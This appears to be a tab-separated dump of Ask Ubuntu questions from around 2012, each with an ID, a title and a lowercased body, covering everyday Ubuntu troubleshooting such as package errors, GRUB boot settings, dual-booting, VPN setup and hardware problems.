cairo-dock empathy libgrip0 eog libevince3-3 libnautilus-extension1a evince evolution-data-server gir1.2-caribou-1.0 gir1.2-gkbd-3.0 gir1.2-gtksource-3.0 gnome-themes-standard libmutter0 gir1.2-mutter-3.0 librhythmbox-core5 gir1.2-rb-3.0 gnome-settings-daemon ubuntuone-client libsyncdaemon-1.0-1 ubuntuone-client-gnome libubuntuoneui-3.0-1 proe : sub-process /usr/bin/dpkg returned an error code ( 1 )
166624	how do i repair ubuntu 12.04 64-bit on a laptop with water damage ?	background : i have an asus laptop that has an amd 64-bit processor , which also came with window 7 pre-installed . since i removed the original harddrive that came with it and installed a larger wd drive , i formatted it and installed ubuntu 64-bit on it . i have upgraded many times and now have ubuntu 64-bit 12.04 on it . problem : my laptop had been running fine and fast . then while it was powered on , but the lid closed , it got quite soaked when an angry cat decided to use it as a litterbox to piss on . as gross at it sounds , it is not nearly as gross as it smelled and was for me to personally deal with . at first it seemed to not hurt the laptop , but i unplugged it and carried it away quickly to deal with the mess , as well as that cat ! grrrr.. the laptop was already turned off , or lost its power before i looked at it to see about powering it off . i did n't want it to get shorted . i wanted it to be dried and cleaned before i would try to power it again . i did as much airing out as i could after taking out the battery and the components and cleaned them , drying them , the best i could . it seems the wetness got into the laptop and got under the keypad to my dismay . when 2 days later i tried to power it on , the light would turn on but the screen would not . it would not boot . i was upset , but did n't give up . not until i tried removing the memory sticks and tested them one by one , did i think that using one stick would lead it to boot , but the o/s was slow and would not run any programs . i thought there must be damage . i need help with : after taking it to a `` pc doctor '' who ended up saying the `` water ( urine ) damage '' caused me to lose my usb drives on the right , but everything else tested true , even the stick of memory that i could n't get the laptop to boot with as long as it was in place . he said it was working and i took it home . however , it is very slow , crashing a lot , and it just locks up , freezes , sometimes for a minute , two , and i ca n't get anything to really do anything , other than using terminal to go a run the upgrade and i installed about 120 upgrades without delay . i thought upgrading it as much as i could would repair the system , but to no avail . ( this was what the pc doctor guy said it needed : he thought wrongly that i had not the latest upgrades for my new version of 12.04 ) . i think perhaps the harddrive got wet or something shorted a connection , and maybe the memory is being written to wrongly . i had a problem like this before when i removed the orignal harddrive and replaced it with a new one when windows 7 got issues from a fist on the keyboard . maybe i need to reinstall ubuntu 64-bit , or is there something i can run from the terminal to repair unity , or ubuntu ? i ran the memory-test at first from the boot screen when it said that : ubuntu was not shut down correctly and the memory tested fine . i ran in safe mode and tried to run repairs and upgrades and anything i thought could repair it . i ran into some package inheritance problems that i repaired , but all of this did not repair the system . running the system in safe mode and in terminal seems to show that it runs quickly and without problems . it is just when in unity that the system is and crashes . hence my notion that it needs to be reinstalled/repaired somehow . does this sound right ? since i can not download ubuntu 12.04 64-bit lts or anything on my laptop i am now on a family member 's windows 7 computer typing this . i can download it hear and burn it to dvd . would that be able to be made into a live boot disc ? i only see a cd image , but my family member only owns dvds to burn . what able preserving my data when doing this ? would i need to download all the upgrades and packages and all else after doing this reinstallation ? what else are my options ? run ubuntu off my cd/dvd as a live disc ? anything else ?
166626	how to install openvpn on lubuntu ?	i went the the connection manager , then clicked on the vpn tab , but the add button is disabled . what should i do ? i can not connected to the internet without the vpn turned on . i 'm trying to install openvpn as a client . i already have the ca.crt and the client.conf with me and currently connected thanks to windows xp .
166629	how to stop nautilus from using home as desktop folder ?	as of a recent boot , my desktop folder is defaulting to ~/ . i would prefer the default behaviourâ : the desktop directory should be ~/desktop . as a first way to solve my problem i tried gconftool-2 -- set -- type bool /apps/nautilus/preferences/desktop_is_home_dir false it did n't work so iâ tried a second idea : i edited my ~/.config/user-dirs.dirs file . i changed the xdg_desktop_dir environment variable to $ home/desktop , which is the default , and also to the absolute path /home/ < my user name > /desktop . neither value make it show , even after killing nautilus and relogging . what else could cause this behaviour ?
166631	how do i download ubuntu for another computer , that has no internet access ?	will the entire ubuntu software fit onto a single cd ? if i download ubuntu to a cd , for use on another computer , will it automatically install/partially install on the computer i use for the download ? if alternative measures must be taken to prevent installation on the `` host computer '' , what steps must be taken , since i do have access , but do not have permission to download to the `` host computer '' ?
166635	dual exchange account email client	i am trying to find a ubuntu mail client that can have multiple exchange mailboxes on the same session similar to what outlook does example inbox1 is my primary account but i have access and send as permissions to inbox2 i have both accounts set up on my profile in outlook , and am looking for something that will do the same in ubuntu . anyone know the application i am looking for ?
166642	software updates reports wrong last check time	every time after i run software updates , and have installed all the updates , the software updates manager will show `` the last check for updates was over a week ago . please click check for updates to check . '' but the last update check was just minutes ago . how can i fix that ? i checked the package history , and under today there 's all the updates i 've installed minutes age . it seems normal . and the system date and time are correct . i am using kubuntu desktop 12.04 x86-64 btw . edit : done sudo apt-get update tail output : w : failed to fetch bzip2 : /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_precise_main_source_sources hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/extras.ubuntu.com_ubuntu_dists_precise_main_binary-i386_packages hash sum mismatch w : failed to fetch bzip2 : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_precise-security_main_source_sources hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead .
166643	what does `` vesa : madison '' in the graphics driver information mean ?	it indicate `` experience : standard '' on graphics driver . what does it mean , is there any other experience other than standard ? or can it be upgraded ?
166644	no widget drag/drop in qt creator after blender-startup	my problem is that every time i start blender 2.63 in 12.04 ( 64-bit ) , i am not able to drag and drop widgets in qt creator anymore , even after closing blender again . i have tried restarting qt , compiz and unity ( at least i think i did by executing compiz -- replace and unity ; i 'm quite new to linux ) with no effect . after logging out and back in , everything is back to normal . is there any workaround for this problem ? qt creator is version 2.4.1 with qt 2.8
166647	errors when apt-get upgrade	i recently updated an server from 8.04 to 10.04 , the update ran basically flawlessly , but now every time i use apt-get i get strange error messages . : ~ # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up gcj-4.4-jre-headless ( 4.4.3-1ubuntu4.1 ) ... update-alternatives : error : /var/lib/dpkg/alternatives/rmid corrupt : invalid status dpkg : error processing gcj-4.4-jre-headless ( -- configure ) : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : gcj-4.4-jre-headless e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i dont even use java on that machine . how can i get rid of it ( apt-get remove or purge did not work ) . any ideas ? thanks for your help .
166648	direct x-forwarding	i 'm struggling to set up x-forwarding between 2 different machines on my local network and my ubuntu desktop . i 'm able to connect using ssh x-forwarding one one machine , but the other machine ( a qnap ts-219p ii ) seems to have a less functional build of ssh on it , and i 'd rather use a simpler approach . i 've set $ display , and done 'xauth list $ display ' on the desktop , then 'xauth add ' on the remote machine . from the remote machine , i just get xterm xterm xt error : ca n't open display : 192.168.0.4:0.0 now , oddly , if i connect via ssh -x , there is a different magic cookie for the tunnelled port ( but neither seems to work ) . i 'm wondering if there is a port which needs to be enabled to permit x connections from the lan ? if so , how ? the proper solution might be to re-build all the packages which are preventing x-forwarding from working on my qnap machine , but lets assume for the purposes of this question that i 've tried building enough packages on that architecture already and want to run x without the overhead of encryption .
166652	backup samba server with rsync ?	we have a common samba server for all the departments . however we are not taking any backup of this server in other location . recently this leads a lot of data corruption . and we are unable to restore any those datas . i just want to take a step forward to avoid this problem in future . is there a way to backup files which is in samba server to other location using rsync ( incremental backup ) ? pls someone explain it with an example in detail . thanks in advance .
166655	how do i remove a website from ubuntu 's web applications ?	i thought i would try out the new webapps ppa and everything seems to be working fine . however , google reader now floods my messaging menu with all my feeds and turns the icon blue . how can i remove a specific site ( google reader ) from accessing webapps after i have accepted it ?
166658	how to enable grub menu on ubuntu 12.04 server ?	i have an ubuntu server installed , and no matter what settings do i try to change , the grub menu wo n't appear . it only shows `` booting hard disk ... 10 ... 9 ... '' and that 's all ! my /etc/default/grub file . the /boot/grub/grub.cfg . it 's a kvm guest .
166668	security - is there a tool for gmail that integrate in desktop and does not ask my password ( oauth ? )	i am a new user of linux and i love it so far . i am also a great fan of google products and i was searching for a gmail app that could tell me when i have unread emails . unfortunately , all these apps are asking my password and i do n't know if that 's a good idea . i was thinking i could login on a webpage ( oauth or similar ? ) so i am sure the app does not know my password . do you know a workaround or an official app i can trust to get notified when gmail mail arrive ?
166679	how can i convert a tex file to pdf on via the command line ?	is there a package that contains a tex to pdf converter/renderer available on ubuntu 12.04 ? if not can you recommend a tool for me to download from elsewhere that can do this that is simple to install ?
166680	gsm sim card pin code recovery	i 'd like to reinstall a ubuntu laptop that has working wwan , but i lost the pin code of the sim card . since ubuntu uses the sim card fine , i 'm assuming that it has the pin code written somewhere in a config file ... how to see the sim card pin code that ubuntu has kept in configuration ?
166682	how do i turn off the discrete card on boot when there 's no option in the bios ?	i have quite old laptop - msi cx620mx . it has two graphic cards - integrated intel card and ati mobility radeon hd545v . i have installed win7 and ubuntu 12.04 . i would like to know , how can i disable the discrete card on bot up so that laptop saves me energy and the processor would n't be running all the time at about 65 - 70 degrees . can anyone help me ?
166687	random log outs	sometimes , usually not long after resuming from suspend , the screen goes black , then purple , then brings me to the log in screen , where after logging in i have lost all my work as if i have been logged out . this happens when i 'm using google chrome , but i could n't say whether that was defiantly the problem as this only happens on my netbook with i use exclusively for web browsing using chrome . any help would be much appreciated .
166688	terminal shows root @ homeserver when logging in with user	i have an ubuntu server 12.04 running on a dell d620 machine called `` homeserver '' . everytime i log into the ssh with the user homeserver ( yes same name as machine ) the terminal shows root @ homeserver . i looks like i even have admin rights . the last thing i 've done was trying to install roundcube on the machine . what is the possible reason for this problem ? edit : i log in from my windows machine with putty homeserver @ 192.168.178.20 < -- ip of the machine root @ homeserver : ~ # id uid=0 ( root ) gid=0 ( root ) gruppen=0 ( root ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,111 ( sambashare ) ,113 ( lpadmin ) root @ homeserver : ~ # who homeserver pts/0 2012-07-22 13:30 ( dennis-ibm-laptop.fritz.box ) edit2 : root @ homeserver : ~ # getent passwd homeserver homeserver : x:0:0 : homeserver , , , :/home/homeserver : /bin/bash
166691	macbook pro 3.1 german keyboard with ubuntu 12.4 ( @ and € keys )	how can i with ubuntu 12.4 type characters like @ or € with my macbook pro 3.1 german keyboard ?
166692	is there such a thing as a ubuntu certified engineer ?	i am looking for certification on ubuntu server technology or possibly debian ( as long as its supplied by canonical , is that even possible ? ) which ubuntu is based on . is there such a thing provided by canonical ? in what regions are these services available ? can someone get ubuntu training and certification the same way red hat and other companies supply ? where can i get more information on this matter ?
166695	source .profile using bash ?	i am unable to source my ~/.profile using a bash script . i tried : source ~/.profile by the way this is the script i am using # ! /bin/bash echo enter the shortcut , or alias , you want to use : read shorttext echo now enter what text you want it to replace : read longtext echo `` alias $ shorttext= ' $ longtext ' '' > > ~/.profile echo `` alias $ shorttext= ' $ longtext ' was added to your profile.the alias will work after logoff/on ''
166704	dash search function displaying 'old ' result	i 'm no ubuntu expert but i have had brief experience with linux in the past and use it a bit at my university . today i had an issue with the dash search function . specifically i downloaded a program called teamspeak 3 to my /downloads folder . i then executed the .run file and installed the program , which resulted in a folder appearing in my /downloads folder containing the program and associated files . i ran the program a few times from that location but thought there must be a better place to store the files . i used the sudo mv command to the move the folder into /opt . i later realised the program had been running while i did this but it did n't kick up any errors . this was no problem , but when i searched the term 'teamspeak ' in the dash it would still show the /downloads folder instead of the /opt folder . so the problem is simply that the dash search has n't updated the folder 's location . the program runs fine from /opt so thats not an issue . any assistance would be much appreciated : )
166707	satellite l640 battery applet problem	hayy guy i got a satellite l640 and i installed ubuntu 12.04 on it and i dont get the battery percentage ive tried a fair bit but this is my first time using linux . ive gone into the power option and ive installed battery status apps and still i get nothing . there was one saying how much amps and what not the battery has and it all has 0.00 for everything , ive also tried the terminal cammands to see the percentage and that doesnt work . is there anything i can do or should i just got back to windows .
166708	how do i browse pictures and files on an android phone via usb ?	i 've got an android lg p690 mobile phone . i would like to know how to browse its pictures , videos , and music files from my ubuntu desktop system . i 've figured out how to do this with blutooth , but would also like to do this using the physical usb to micro usb b connector between the pc and the mobile phone . do i need to install any special drivers in order to get this to work ?
166710	gnome-shell weather	i try install weather in gnome-shell via tutorials : google.com/search ? q=gnome+shell+weather webupd8.org/2012/03/official-gnome-shell-extensions-weather.html webupd8.org/2012/06/alternative-gnome-shell-weather.html and still do n't work , everything install without errors gnome-tweak-tool from sudo and without looks same : i just wan na have weather in panel : ( /etc/apt/sources.list.d $ ls -1 gnome-shell-extensions-ppa-precise.list webupd8team-gnome3-precise.list
166711	how do i delete an icon from dash ?	i installed adobe reader on ubuntu 12.04 from a .bin file , but it was not working properly so i want to remove it and reinstall it using ubuntu software center . to remove it i deleted its source file , but i was not able to delete its icon from the dash home . can anyone please tell me how to do that ?
166713	ca n't update skype , please help ?	( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 166465 files and directories currently installed . ) preparing to replace skype 2.2.0.35-0precise3 ( using ... /skype-debian_4.0.0.8-1_i386 ( 1 ) .deb ) ... unpacking replacement skype ... dpkg : error processing /home/ybnrmalatall/downloads/skype-debian_4.0.0.8-1_i386 ( 1 ) .deb ( -- install ) : trying to overwrite '/usr/bin/skype ' , which is also in package skype-bin 2.2.0.35-0precise3 dpkg-deb ( subprocess ) : data : internal gzip write error : broken pipe dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg-deb ( subprocess ) : failed in write on buffer copy for failed to write to pipe in copy : broken pipe errors were encountered while processing : /home/ybnrmalatall/downloads/skype-debian_4.0.0.8-1_i386 ( 1 ) .deb
166716	what is the meaning of `` block special '' ?	i tried this command on my linux ubuntu prompt in amazon web services sudo file /dev/xvda1 and the output is /dev/xvda1 : block special what is the meaning of block special in the output ?
166719	installing and creating themes in the gnome desktop	in ubuntu 9.x , i could browse/install and create/name etc all aspects of the theme , even go to the gnome art website and download and install gnome themes all with one tool . now i can only customize bits and pieces of a gnome theme , and ca n't even install gnome themes when i download the gnome art packages . i have to do this manually . i ca n't even change the colours of the main window menu . i could do all this with one simple application in version 9.x , but from 11.x on i have not been able to do this . there are application which can do this , but only change different pieces of the theme , such as colours , window colours , fonts etc . where can i get the application that 9.x used ? it was so convenient . i am currently using ubuntu 12.04 lightdm with lightdm greeter and gnome-classic metacity desktop .
166721	how to backup and restore downloaded gnome-shell extensions ?	i have downloaded several gnome-shell extensions from official gnome site and installed . but , i do n't want to install them every time , i re-install my ubuntu . i want to have a feature to backup those extensions and restore them as required . how can i do that ?
166723	dual monitor gnome-shell broke itself	ok , lets get this over with . i have a dual-monitor , ati setup on gnome-shell that was just fine until this morning . then , this happened . look closer ... whatever has happened to my ubuntu setup ? my second monitor still works , entirely normally , with the exception that i can not ( obviously ) access activities ( as i am in gnome-fallback ) . i do wish to resume my work ... edit : by entirely normally , i mean i can move my mouse over it and have seperate windows on it and stuff . it 's not mirroring . update : unity works entirely normally .
166727	ubuntu : purpose of home directory files and folders	i 've just installed the latest version of ubuntu 12.04 lts . i would like to ask , what is the purpose of the examples.desktop text file my home directory ? also , what is the intended purpose of the folders public and templates ? thanks , john goche
166729	gnu readline and the alt key in 12.04	gnu readline lets you move a word forward/backward using m-f and m-b ( where m is usually the alt key ) . but ever since upgrading to 12.04 it stopped working . at first i tried disabling the `` key to show hud '' in compiz , but it seems like that 's not enough . any way around this ?
166730	change boot priority in grub	i installed precise on my friend 's computer to use it , but it automatically boots into precise . he has xp and wants it to boot into xp automatically . how can i set windows xp to be the primary boot operating system ?
166731	how to boot into windows 8 ?	i have windows 8 release preview and installed ubuntu 12.04 to just try it out from a flash drive . when i restart , i can not do a system recovery to uninstall ubuntu and return to factory shipped condition anymore . i 'm new to ubuntu and do n't know much about it so i did n't like it . i ca n't boot into windows , when i restart , i ca n't choose which os to load because my screen says input is out of range and all i see is a black screen . then i have to wait 1 minute until i see that ubuntu has loaded . all i want to do is get windows back by loading it up or system restore but i ca n't .
166733	how do i set ubuntu to compress a series of folders , deleting the original after its been compressed ?	i need to setup some kind of script to go through a set of folders , compressing each one , and only leaving the compressed copy of each . how can i do that ?
166738	speakers make tiny crackle noise every second , then trackpad stops working on a dell studio xps 1640	so for the past few days , an issue has arisen that ca n't be ignored anymore with ubuntu 12.04 on my dell studio xps 1640 laptop . i 've had 12.04 installed on it for months with no problems until recently . now , randomly occurring , my internal speakers will sometimes beging a routine of consistent ( every 1.2 seconds or so ) cracking/popping/clicking ( no idea how to describe , it 's kind of that sound you hear when your speakers go 'oh , i 'm about to play some sound , ' like a sound is trying to be played , but ca n't get out ) , even if the speaker volume is at 0 or muted entirely . changing the sound volume does not change anything about this click noise . i 've also noticed that about 90 % of the time , this sound is a precursor to my trackpad simply stopping working ( the computer itself still remains operative though , as about 99 % of the time , i can still use the keyboard ) . if i plug in a usb mouse , it still works fine . is there some sort of issue with my trackpad driver ? i 'm not sure what driver ubuntu uses by default when detecting all of its hardware upon installation . synaptic ? any help would be greatly appreciated ; thanks !
166743	kalarm wo n't start at login	i installed kalarm ( a kde software ) in my ubuntu 11.10 and checked off `` start at login '' , but it does n't . how can i make this work ?
166746	ubuntu distribution : original investor	i just have seen a `` canonical limited '' is the investor of ubuntu linux . first time i downloaded ubuntu linux a us corporation was investor of ubuntu . sameways many different guesses about why it has an african word as the name of the distribution came up in new forums about ubuntu linux . as ubuntu started , it 's name was just an african word to turn the common mind in the world of linux geeks , as most where against asking questions of beginners and answered `` use google '' or `` read the f*cking manual ( rtfm ) '' - so creators of ubuntu used an african word of humanity that it will have several bulletin boards that will not `` harm '' , if a beginner has a frequently asked question . this is how i do know it from the beginning of ubuntu linux . actually some other boards started and even wikipedia has a different mind of ubuntu , since canonical took over . so what us corporation was it in the very beginning ?
166749	opera wo n't download into ubuntu 11.10	i tried to download the opera web browser into ubuntu 11.10 from www.opera.com . i followed the procedure , pressing the download button for opera for linux . if i `` save to disk '' , and then try to open the download , a window pops up that says `` internal error - the file /home/bob/desktop/opera ... . '' etc . is opera not compatible with ubuntu 11.10 ? it was with an earlier version of ubuntu . is there a way around this ?
166751	merging two pictures	is there a tool in ubuntu to automatically merge two images having a common strip ? i need to scan a large image , which will not fit at once in the scanner . i was thinking about scanning it in two parts and hand-editing the result in gimp to join them . but probably an automatic tool can do the same more quickly and better . edit i think i may have not made my point clear . my difficulty is not aligning two images . my problem is that one has to compensate for the rotation or distortion introduced by the manual process of putting the sheet into the scanner , and an automatic tool should obtain more precise results at analyzing common patterns in the two images to rotate and align them seamlessly .
166754	unity bar does n't hide	after switching the 'auto hide ' function on and off under behaviour in appearance settings , the unity bar does n't automatically hide anymore ! it 's always visible at the left side ! here is a screenshot : https : //www.dropbox.com/s/5g3gm4se8boqy5v/schermafdruk % 20van % 202012-07-22 % 2017 % 3a31 % 3a33.png the unity bar is n't placed over the program when it 's maximised . i just read here that unity 2d does n't have a reset option ( ? ) ( my graphics card does n't support unity 3d acceleration ) how do i get back the standard unity setting ( that it hides automatically when a program is maximized ) ?
166760	how do i play movies on google play ?	when trying to play a movie i purchased from google play , the movie player ( same flash-based one used by youtube ) spits out the following error message over a background of faux-tv-static : an error occurred . please try again later . this is super-frustrating because i had just paid real money ( $ 3.99 ) to watch the movie , as opposed to , you know , going someplace illicit to download it for free . all other youtube videos play fine for me , including the freaking google play trailer for the movie i bought ! sheesh . i googled around for solutions , but i guess google play is too cutting edge for ubuntu , because most of the solutions ( in ubuntu forums , for example ) recommended installing a linux-specific firefox plugin called flash-aid that essentially runs a configurable set of shell commands to ensure that you have the latest flash from adobe installed , and that you do not have any of the possibly conflicting free implementations of flash installed ( gnash , etc ) . suffice it to say , installing and running flash-aid did not help . also , i would add , i experienced the same error message trying to play the movie in chromium .
166763	where are the default unity lenses stored ?	i want to create a home build lens for the 12.04 dash and liked to use one of the default lenses as example . i 'm thus for looking where i can find the files of these lenses .
166764	how long can file names be ?	how long can be files names and folder names in ubuntu linux and what characters are allowed in file name and folder name in ubuntu linux ?
166774	autostart in .xinitrc	i want to run some program at awesomewm startup . i have in my .xinitrc this line : exec awesome it works . then i added this : exec guake i got errors . so i did this : guake i put each of these lines separately before `` exec awesome '' , after it . it does not work . i tried the same with other programs . the result was the same . i do n't want to rely on awesomewm capabilities to start programs , i know about them . i want to make it in .xintirc . how to launch a program at awesomewm startup ?
166776	how to remove windows from grub menu and boot straight to ubuntu ?	i have removed windows 7 using gparted , and want my computer to boot straight into ubuntu , but i still get the dual boot screen , how can i fix this ?
166777	how can you make a .sh file come on at startup in lubuntu 12.04 ?	running lubuntu desktop on samsung n145 netbook . i got so far as /etc/xdg/lxsession/lubuntu/autostart and added the line @ home/magpie/touchpad_settings.sh where the name of my file is touchpad_settings.sh and it does execute and work if clicked then executed . this meant i could no longer login and get my panels though , so i undid it with my usb booter and came here to see if anyone could clarify . lubuntu does not use a startup manager and this is a home-made file so it wo n't be in desktop session settings either . as suggested in answers below i tried # ! /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . /bin/sh /home/magpie/touchpad_settings.sh exit 0 i also tried the lines : /bin/bash /home/magpie/touchpad_settings.sh and sh /home/magpie/touchpad_settings.sh which did not work .
166778	ubuntu crashed , now , how to load kernel in gnu grub ?	i 'm trying to load the kernel in 12.04 's version of gun grub . when i type boot i get the `` no loaded kernel '' error . i 've tried recommended instructions of search -- set=root -- file /vmlinuz but i get the error : no such device : /vmlinuz so ... advice on how to set this and why i 'm having trouble ? also , i 've burned the .iso for boot-repair but i do n't know how to set it to boot . i 'm on a pc running windows 7 and ubuntu 12.04 . i ca n't get to the bios settings though and grub is a mystery to me . any advice would be greatly appreciated . some other notes . `` find '' is n't a recognized command in grub . when i search as follows : search /vmlinuz or search -- file /vmlinuz i get no such device : /vmlinuz when i type ls i get : ( memdisk ) ( loop0 ) ( hd0 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 )
166780	nagios configuration on ubuntu	i ca n't edit the file /usr/local/nagios/etc/objects/commands.cfg using `` vi '' editor this file is `` readonly file '' please help me , i want edit it as recomanded in the nagios quickstart-ubuntu ( http : //nagios.sourceforge.net/docs/3_0/quickstart-ubuntu.html ) thanks : )
166783	i am unable to install google chrome via ubuntu software centre	i downloaded a stable version of google chrome . a .deb file got downloaded ( i386 ) . when i double click on it , ubuntu software centre opens up and tries to install . but everytime an error pops up- internal error .the file ( /path to chrome ) can not be opened . i have tried many methods but this just wo n't go . i do n't think that the file is corrupted because this is the third time i have downloaded it . thanks in advance : )
166800	firefox crashes when i use bash ( ubuntu 12.04 lts )	i have been having the most annoying problem : every time i open bash when i am using firefox , it ( ff ) crashes . not immediately , but when i start typing - no matter what i type - it crashes ... i have recently ( today and yday ) updated my system using the update manager , and i suspect it has something to do with this , but being a total beginner , i do n't know how to review my latest upgrades and uninstall the ones that are responsible . perhaps i need to check for ff updates ? i do n't think so - i am using the latest ( ? ) version 14.0.1 . does anyone have any clue how to get to the bottom of this ?
166802	very poor performance after downloading kazam screencaster	i wanted to do some fullscreen video recording to demonstrate some software i was using . i downloaded kazam screencaster but the performance is really bad . i recorded 30 seconds of video but it locks up and i basically have about 4 frames in the entire file . i am using the default options but this happens every time . is there anything i can do to get better performance ? my laptop runs with 4gb memory . has anyone else had similar problems ? can anyone be recommend an alternative ?
166803	how remove all programs from a meta-package ?	when you install a program like postgresql , it installs several programs for its last version . once installed how remove all those packages ? because using apt-get remove postgresql removes only that meta-package
166807	how to know version of program in meta-package ?	how to know the version of a set of program to be installed through a meta-package ?
166809	how can i disable my webcam ?	i have an integrated webcam in my laptop . i know that it works and that ubuntu recognized it because at installation it asked if i wanted a photo taken for some kind of image associated with my account . when i look in system settings , i do not see any webcam in the hardware section . i would like to disable the webcam like you can do in windows , but as i ca n't find it in my hardware section , how can i disable it ? i can not even unplug it as it is integrated into the monitor . am i looking in the wrong place ? ? i am using 12.04
166812	after upgrading to 12.04 from 10.10 my mythbuntu standard mceusb remote no longer works	i had no problems using my windows media center remote with 10.10 mythbuntu , but after upgrading , it no longer affects mythbuntu . i have verified and re-installed it in mythbuntu control centre . i have used irw to verify the ir buttons actions are properly received by the htpc . how do i go about fixing this ? 3.2.0-26-generic ( # 41-ubuntu smp thu jun 14 17:49:24 utc 2012 ) xorg version : 1.11.3 ( 16 july 2012 08:06:31pm ) gcc : 4.6 ( x86_64-linux-gnu ) current updates as of 2012‧07‧21 $ cat /etc/lirc/hardware.con # chosen remote control remote= '' windows media center transceivers/remotes ( all ) '' remote_modules= '' lirc_dev mceusb '' remote_driver= '' '' remote_device= '' /dev/lirc0 '' remote_socket= '' '' remote_lircd_conf= '' mceusb/lircd.conf.mceusb '' remote_lircd_args= '' '' # chosen ir transmitter transmitter= '' none '' transmitter_modules= '' '' transmitter_driver= '' '' transmitter_device= '' '' transmitter_socket= '' '' transmitter_lircd_conf= '' '' transmitter_lircd_args= '' '' # enable lircd start_lircd= '' true '' # do n't start lircmd even if there seems to be a good config file # start_lircmd= '' false '' # try to load appropriate kernel modules load_modules= '' true '' # default configuration files for your hardware if any lircmd_conf= '' '' # forcing noninteractive reconfiguration # if lirc is to be reconfigured by an external application # that does n't have a debconf frontend available , the noninteractive # frontend can be invoked and set to parse remote and transmitter # it will then populate all other variables without any user input # if you would like to configure lirc via standard methods , be sure # to leave this set to `` false '' force_noninteractive_reconfiguration= '' false '' start_lircmd= '' '' # lsusb | grep -i infrared bus 003 device 002 : id 0471:0815 philips ( or nxp ) ehome infrared receiver
166824	how to use gnome contacts ?	i just upgraded to ubuntu 12.04 , looking forward to use the new gnome contacts , but i had some issues . at the first start , i was asked what contact source to use . i had three choices : local , google and google . which is weird , since i have configured just one google account configured in online accounts . at any rate , i chose the first one ( blindly , i had no way to tell the two apart ) and it seems that i see my google contacts in the address book . the problem is that for some of them , i see something like some data ... local some data.. google some data ... that is , the data is repeated three times . i am pretty sure my google address book is clean : i manually removed all cruft and merged all duplications no longer than one month ago . so , why is that i am seeing these repetitions ? is gnome contacts using my old evolution address book ? i would like to configure it , but i can not even find a menu .
166828	server 12.04 boot dhcp , can not find hard disk	i am trying to set up ubuntu server 12.04 lts on my old dell desktop for a lamp home testing server . the install went fine , but when i start up , i do not see the the grub boot loader ( which i re-installed in recovery mode ) . i flagged '/dev/sda5 ' as my bootable partition , but it looks like it is still trying to boot from the network ? it is plugged directly to my router via ethernet . i was reluctant to post because i feel like this is a stupid question , but i am still learning , so any help setting up this lamp server is greatly appreciated ! thanks ! `` screenshots '' : http : //i.stack.imgur.com/1zb9n.jpg ~2-5 minutes , it tries to boot from dhcp ? http : //i.stack.imgur.com/k2vdz.jpg pxe-e53 : no bootfile name recieved . does not find my bootable partition .
166830	how to install windows 7 inside oracle virtualbox	i am running ubuntu 12.04 lts ( 32-bit ) on a 64-bit machine . i want to install windows 7 64-bit inside virtualbox . i have enabled virtualization in the bios . i have installed oracle virtualbox with the latest .deb from oracle . i am able to create .vdi ( virtual disk images ) and .vhd ( virtual hard drives ) on my system . i have root access . i also have the windows 7 recovery disk . i do not have a windows 7 disk image of a snapshot of windows 7 on the same pc . i do have a windows recovery partition on disk , but it seems this one is not accessible by virtualbox . how do i install windows 7 64-bit inside ubuntu ?
166832	is there a way to use tor system-wide ?	almost everything is blocked where i am and i need to use a transparent proxy to access anything . i tried using tor ( online anonymity software ) but it does n't work for all the system applications . i also tried putting 127.0.0.1:8118 in system 's proxy settings and applied it system-wide . but it did n't help at all .
166833	how can i expand a partition into non adjacent unallocated space ?	here the deal : i have ubuntu 12.04 and windows 7 both install in separate partitions in the following partition configuration : windows ubuntu swap i decided that i wanted to move 50gbs from linux to windows , so i shrunk the ubuntu partition with gparted . now it 's like this : windows ubuntu 50gbs unallocated space swap now , i tried moving the ubuntu partition to the right so that i could expand the windows one , but gparted warned me that moving it could make linux unbootable . is there any way to do this without breaking my os ? thanks a lot .
166836	what partition settings should i use when setting up a new hard drive ?	i partitioned my drive in three parts . ubuntu 12.04 options are / , boot , usr , ext2 , ext3 , ext4 , swap , etc . the program would only accept `` / '' for the first partition . what settings , and why , should i use for partitions 2 , 3 or 4 ?
166839	not enough swap : hibernation not working in 12.04 ?	total memory ram:3557mb and swap : 255mb searching from forums , i came to know that , i need to partition the swap , so as to make swap double the size of my ram . so , do i need to allocate 7gb for the swap ? my next question is , how do i do the swap partition in ubuntu 12.04. and my final question , i too have windows in my system . will this swap repartition affect my windows in any way ? thank you .
166840	dual booting ubuntu as secondary on harddisk	i have two linux distros that i want to dual-boot off a single 140gb serial ata drive what i want to do is set up both distros so that i can boot either of them whenever i start up , i 've done this with windows which was fairly simple since all i needed was to install the distro on a seperate partition and it pretty much did this all automagically but at this time i have a linux os and i want to boot ubuntu as a secondary os , how would i go about doing this , how would i have to partition my drive and what set up would i need to get them to dual boot , i have no problem re-installing my current linux distro since i back up all my files on an external , and my set up is rather basic plus with this i 'm hoping to also create a shared folder between the 2 os systems the distros i 'm using are backtrack 5 r2 ubuntu 12.04 lts i really need help with this since my first attempt broke backtrack and would n't let it boot up anymore
